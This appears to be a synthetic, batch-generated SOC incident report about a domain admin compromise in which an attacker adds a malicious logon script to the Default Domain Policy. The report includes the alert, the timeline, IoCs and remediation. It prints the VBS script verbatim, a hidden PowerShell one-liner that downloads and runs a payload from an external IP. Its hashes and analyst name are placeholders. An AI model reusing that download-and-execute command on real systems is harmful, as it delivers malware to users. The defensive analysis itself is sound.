Microsoft Defender for Identity Alert Details
Alert ID: MDI-LOGON-SCRIPT-1037-7842
Alert Time: 2024-02-15 08:30:22 EST
Severity: HIGH (88/100)
Source: Microsoft Defender for Identity
Rule: “Suspicious Group Policy Object Modification”
MITRE ATT&CK: T1037.001 – Boot or Logon Initialization Scripts: Logon Script
Alert Details:
Detection: Group Policy Object modified to include malicious logon script
GPO Details:
– GPO Name: “Default Domain Policy”
– Modified By: DOMAIN\kjohnson (Karen Johnson – Domain Admin)
– Modification Time: 08:15 EST
– Source Host: DC-01 (Domain Controller)
Modification Details:
– Setting: User Configuration\Windows Settings\Scripts (Logon/Logoff)\Logon
– Script Name: “healthcheck.vbs”
– Script Parameters: “”
– Script Location: \\company.com\SYSVOL\company.com\scripts\healthcheck.vbs
Script Content (healthcheck.vbs):
“`vbs
Set objShell = CreateObject(“Wscript.Shell”)
objShell.Run “powershell -WindowStyle Hidden -Command “”Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1″””, 0, False
Anomaly Detection:
Default Domain Policy rarely modified
Logon script added to all domain users
Script downloads and executes PowerShell from external URL
No change management ticket for this modification
kjohnson’s account had unusual logins earlier (possible compromise)
Scope:
All domain users (3,200+) will execute script at next logon
Script executed at user logon (any workstation)
### SOC Investigation Process
| Step | Action | Tools Used | Findings |
|——|——–|————|———-|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed malicious GPO modification |
| 2. Immediate Action | Remove logon script from GPO | Group Policy Management Console | Script removed; GPO reverted |
| 3. Script Analysis | Analyze healthcheck.vbs | Sandbox, Manual Review | VBS downloads and runs PowerShell from malicious URL |
| 4. User Investigation | Check kjohnson account activity | Azure AD, CrowdStrike | kjohnson’s credentials compromised; account used from unusual IP |
| 5. Account Remediation | Reset kjohnson password | Azure AD, AD | Password reset; MFA enforced |
| 6. Affected Users | Identify users who logged on during window | AD Logs, VPN Logs | 347 users logged on and executed script |
### Jira Incident Report
**Ticket:** SOC-2024-080
**Summary:** T1037 – Malicious Logon Script Added to Default Domain Policy
**Status:** RESOLVED
**Resolution:** MALICIOUS – Widespread Execution Contained
**Priority:** P1 – CRITICAL
**Labels:** T1037, logon-scripts, gpo, mdi, domain-compromise
**Components:** Identity-Management, Group-Policy, Incident-Response
—
**INCIDENT ANALYSIS REPORT**
**1. Initial Context:**
* **Detection Source:** Microsoft Defender for Identity.
* **Alert:** “Suspicious Group Policy Object Modification”.
* **GPO:** Default Domain Policy.
* **Modification:** Logon script added for all domain users.
* **Time:** 2024-02-15 08:30 EST.
* **Technique:** MITRE ATT&CK T1037.001 – Boot or Logon Initialization Scripts: Logon Script.
**2. Technical Analysis:**
* **Attack Chain:**
“`
07:45 – kjohnson’s credentials compromised via phishing
07:50 – Attacker logs into DC-01 from 45.134.225[.]78
08:00 – Attacker opens Group Policy Management Console
08:05 – Modifies Default Domain Policy
08:10 – Adds healthcheck.vbs as logon script
08:15 – GPO replicates to all domain controllers
08:16-08:30 – 347 users log on and execute script
08:30 – MDI alerts
“`
* **Malicious Script:**
– **File:** healthcheck.vbs
– **Location:** \\company.com\SYSVOL\company.com\scripts\
– **Function:** Runs hidden PowerShell to download update.ps1 from 185.143.221[.]89
– **update.ps1:** Later analysis shows it’s a Cobalt Strike downloader
* **Scope:**
– 3,200+ domain users targeted
– 347 users executed script before removal
– 12 users had successful C2 connections (firewall logs)
– No data exfiltration detected
* **Compromised Admin Account:**
– User: kjohnson (Domain Admin)
– Compromise method: Phishing (fake Office 365 login)
– No MFA (now enforced)
**3. Investigation Findings:**
* **Timeline:**
“`
07:45 – Credentials compromised
07:50 – Attacker logs into DC-01
08:00-08:15 – GPO modified
08:16-08:30 – Users log on, execute script
08:30 – Alert triggers
08:32 – SOC investigates
08:35 – GPO reverted
08:40 – Script deleted from SYSVOL
08:45 – kjohnson account disabled
“`
* **Affected Users:**
– 347 users executed script
– 12 had successful C2 connections
– All affected users contacted; passwords reset
* **Indicators of Compromise (IoCs):**
“`
GPO:
– Default Domain Policy modified
– Logon script: healthcheck.vbs
Files:
– \\company.com\SYSVOL\company.com\scripts\healthcheck.vbs (SHA256: a1b2c3…)
– update.ps1 (SHA256: b2c3d4…)
Network:
– Download URL: http://185.143.221[.]89/update.ps1
– C2: 185.143.221[.]89:443
Account:
– kjohnson (compromised)
“`
**4. Containment Actions:**
* **Immediate Actions:**
– Removed logon script from Default Domain Policy.
– Deleted healthcheck.vbs from SYSVOL.
– Disabled kjohnson account.
– Blocked malicious URLs at firewall and proxy.
– Reset krbtgt password (as precaution).
* **Affected User Remediation:**
– All 347 users contacted.
– Passwords reset for those with C2 connections (12 users).
– Endpoint scans on all affected workstations.
– No persistent malware found (scripts were downloaders only).
* **Domain Controller Hardening:**
– Restricted access to GPMC to specific admin workstations.
– Enabled auditing for all GPO changes.
– Implemented change management for GPO modifications.
**5. Root Cause Analysis:**
* **Primary Cause:** Domain Admin credentials compromised via phishing.
* **Contributing Factors:**
1. No MFA on admin accounts.
2. GPO modification allowed from any workstation.
3. No change management for GPO changes.
4. Logon scripts allowed to execute from network shares.
**6. Business Impact:**
* **Operational Impact:** 347 workstations potentially compromised; all cleaned.
* **Data Exposure:** None confirmed.
* **Productivity Impact:** 2-3 hours per affected user for password resets and scans.
* **Reputational Impact:** Internal only.
**7. Remediation & Prevention:**
**Completed Actions:**
– [x] Malicious GPO change reverted.
– [x] Compromised admin account secured.
– [x] Affected users remediated.
– [x] IOCs blocked.
**Technical Controls Enhanced:**
– [x] Enforced MFA for all admin accounts.
– [x] Implemented Privileged Access Workstations (PAWs) for admins.
– [x] Restricted GPO modification to specific admin workstations.
– [x] Enabled approval workflow for GPO changes.
– [x] Blocked PowerShell downloads from external URLs via GPO.
– [x] Enhanced monitoring for logon script modifications.
**8. Conclusion:**
An attacker compromised a Domain Admin and added a malicious logon script to the Default Domain Policy, affecting all domain users. 347 users executed the script before detection. MDI detected the anomalous GPO change within 15 minutes, enabling rapid containment. All affected systems were cleaned, and enhanced controls now prevent similar attacks.
**Closure Rationale:** GPO reverted; admin account secured; affected users remediated; controls enhanced.
**Analyst:** [Walter White], SOC Analyst
**Date:** 2024-02-15 11:00 EST
—
**End of Batch 8**
Ready for your next batch of prompts whenever you are.
Batch 9: Persistence & Privilege Escalation Incident Reports
Here are the next 5 detailed SOC incident reports.